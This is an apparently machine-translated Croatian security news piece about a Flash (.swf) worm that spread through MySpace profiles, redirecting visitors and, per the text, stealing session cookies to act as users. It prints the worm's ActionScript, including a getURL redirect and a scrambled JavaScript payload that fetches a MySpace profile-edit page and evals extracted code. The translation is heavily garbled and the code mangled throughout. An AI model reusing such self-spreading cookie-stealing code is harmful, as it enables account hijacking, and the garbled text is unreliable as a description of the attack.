MySpace je oku�en mimo Bljesak temeljen (swf) crv �to mazanje brz preko MySpace. Posrijedi je ugra�en JavaScript kod u korisnik profili taj redirekcija posjetilac to polo�aj tvr�enja U.S. Vlada je straga 9/11 terorizirati napasti, Symantecupozorenje ponedjeljak Pa ipak Internet mo�e biti pravedan savjet dana ledenjak. Hajdmo uzeti pogledati kako radi to shvatiti kako Internet mo�e biti lak�i izmijenjeni to predati velik dio haraju�i payloads.

nenazvan crv isn't zloban ali Shockwave Bljesak (.swf) varalica mrsan payload polo�iti JavaScript u profil bilo koji MySpace korisnik tko pogled .swf varalica. Ovaj mo�e lak�i odgovor Samy je moj prijatelj crv sa izbiti znoj.

Ovaj JavaScript kod �e onda biti protuma�iti mimo bilo koji korisnik tko posje�en polo�aj, koji dozvoljava sjetilni podaci biti pp od steal, kao �to je mljeveno meso vrijednost zahtijeva to izvr�iti operacije kao korisnik, i predstavljanje operacije na prednost od taj korisnik ( sa privola o�ito). Momentalno, taj pristup je bitak iskori�ten jedini to protezati JavaScript kod to ostali profili na popularan dru�tven mre�a polo�aj.

Ako payload je zloban, Internet mo�e izvr�iti sekundaran napasti poput cilj u zadnje vrijeme pronalaza� ranjivost ganutljiv Microsoft Usluga izdovoljiti se. utjecaj bi bilo velik dio vi�i razotkrivaju�i ravan sjetilni obavijest na tvoj tvrdo- disk.

Hajdmo uzeti pogledati crv, hvala to istra�ivanje mimokinematic.theory:

Na�to te posje�en ve� oku�en stranica, ima je Bljesak predmet ugra�en ("redirect.swf") �to sadr�ati actionscript:
getURL("URL");

Internet OpenBSD i redirekcija te to naveden blog URL.

Na ovaj blog URL ima je drugi bljesak varalica ugra�en "retrievecookie.swf". Internet sadr�ati:

getURL("javas\n\rcript: var neodre�en broj = nov ActiveXObject'Msxml2.XMLHTTP'x.open'GET','http(\\);(\\\:/editprofile.myspace.com/index.cfm?/fuseactionuser.HomeCommentsfriendID93634373',truex.onreadystatechangefunctionif=&=\);=(){ (x.readyState4var==){ pgx.responseTextvar=; scpg.substringpg.indexOf'BX=((\-\'3,pg.indexOf')+(\-EX'whilesc.indexOf'\));(((\
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1var)){ nsc.indexOf'=(\
\'ifn);(==-1nsc.indexOf')=(\-XXX'scsc.substring0,nsc.substringn5,sc.length\);=()+(+);};" + "evalsc();}};" + "x.sendnull();", "");

Internet OpenBSD drugi blog po�ta(povezati) i procijeniti svoj Sadr�aj.

Ovaj kod dobiva tvoj MySpace mljeveno meso �to dopustiti bilo tko djelovati kao te na MySpace i obaviti bilo koji operacije na tvoj prednost poput mjenjanje tvoj lozinka ili dodaju�i netko nepoznat kao tvoj prijatelj, i�ta mo�ete obaviti na MySpace. Momentalno kod dodaje poruka u va� MySpace profil. Internet �irok iskoristiti AJAX za svoj operacije.